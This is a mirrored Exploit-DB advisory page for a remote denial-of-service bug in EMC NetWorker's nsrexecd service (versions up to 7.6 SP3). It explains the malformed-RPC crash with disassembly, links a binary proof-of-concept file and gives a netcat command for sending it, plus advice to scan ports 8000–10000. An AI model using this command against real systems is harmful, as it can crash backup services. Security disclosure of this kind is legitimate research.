bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/dos/18601.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25 
1979 changes to exploits/shellcodes

Couchdb 1.5.0 - 'uuids' Denial of Service
Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Beyond Remote 2.2.5.3 - Denial of Service (PoC)
udisks2 2.8.0 - Denial of Service (PoC)
Termite 3.4 - Denial of Service (PoC)
SoftX FTP Client 3.3 - Denial of Service (PoC)

Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection
SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection

Silverstripe CMS 3.0.2 - Multiple Vulnerabilities
SilverStripe CMS 3.0.2 - Multiple Vulnerabilities

Silverstripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4 - File Renaming Security Bypass

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection

Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection

Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS - Multiple HTML Injection Vulnerabilities

Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

Monstra CMS before 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)

Monstra CMS < 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Navigate CMS 2.8 - Cross-Site Scripting
Collectric CMU 1.0 - 'lang' SQL injection
Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection
LG SuperSign EZ CMS 2.5 - Remote Code Execution
MyBB Visual Editor 1.8.18 - Cross-Site Scripting
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
RICOH Aficio MP 301 Printer - Cross-Site Scripting
Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
RICOH MP C6003 Printer - Cross-Site Scripting

Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
2018-09-25 05:01:51 +00:00

122 lines
No EOL
4 KiB
Text
Raw Blame History

#######################################################################
Luigi Auriemma
Application: EMC NetWorker (Legato)
http://www.emc.com/backup-and-recovery/networker/networker.htm
Versions: <= 7.6 sp3 (7.6.3.2 Build 860)
Platforms: AIX, HP-UX, Linux, Solaris, Windows
Bug: invalid read access
Exploitation: remote
Date: 14 Mar 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's homepage:
"EMC NetWorker backup and recovery software centralizes, automates, and
accelerates data backup and recovery across your IT environment.
NetWorker delivers record-breaking performance and a wide range of data
protection options to safeguard your critical business data."
#######################################################################
======
2) Bug
======
nsrexecd is a service listening on some default ports (like 111, 7937
and 7938) plus another couple of random ones usually over port 8000.
Through a malformed RPC packet sent to one these random ports it's
possible to crash the service due to the hash calculation performed
over an arbitrary amount of data.
From librpc.dll:
0038B3CF 8B4424 3C MOV EAX,DWORD PTR SS:[ESP+3C] ; my_size
0038B3D3 8B6D 00 MOV EBP,DWORD PTR SS:[EBP]
0038B3D6 2BF0 SUB ESI,EAX
0038B3D8 897424 38 MOV DWORD PTR SS:[ESP+38],ESI
0038B3DC 8B33 MOV ESI,DWORD PTR DS:[EBX] ; size
0038B3DE 8B9C24 90000000 MOV EBX,DWORD PTR SS:[ESP+90]
0038B3E5 2BF0 SUB ESI,EAX ; size - my_size
0038B3E7 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10]
0038B3EA 50 PUSH EAX
0038B3EB 8D4C24 3C LEA ECX,DWORD PTR SS:[ESP+3C]
0038B3EF 51 PUSH ECX
0038B3F0 8D5424 48 LEA EDX,DWORD PTR SS:[ESP+48]
0038B3F4 52 PUSH EDX
0038B3F5 2BF7 SUB ESI,EDI
0038B3F7 53 PUSH EBX
0038B3F8 897424 54 MOV DWORD PTR SS:[ESP+54],ESI ; the new size
0038B3FC 896C24 50 MOV DWORD PTR SS:[ESP+50],EBP
...
0038AFC5 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
0038AFC9 51 PUSH ECX
0038AFCA 8B4C24 1C MOV ECX,DWORD PTR SS:[ESP+1C]
0038AFCE 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C]
0038AFD2 52 PUSH EDX
0038AFD3 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4] ; new size
0038AFD6 8B09 MOV ECX,DWORD PTR DS:[ECX]
0038AFD8 52 PUSH EDX
0038AFD9 8B5424 2C MOV EDX,DWORD PTR SS:[ESP+2C]
0038AFDD 51 PUSH ECX
0038AFDE 8B48 20 MOV ECX,DWORD PTR DS:[EAX+20]
0038AFE1 52 PUSH EDX
0038AFE2 8B50 1C MOV EDX,DWORD PTR DS:[EAX+1C]
0038AFE5 51 PUSH ECX
0038AFE6 52 PUSH EDX
0038AFE7 E8 04E3FFFF CALL LIBRPC.cryptoiface_get_hmac ; hash crash
Note: after the crash it's necessary to restart also the other services
so that the situation can return normal and the bug can be tested
again.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/nsrexecd_1.dat
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18601.dat
nc SERVER PORT < nsrexecd_1.dat
it's enough to scan all the ports from 8000 to 10000 to catch the
correct one automatically.
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Reference in a new issue View git blame Copy permalink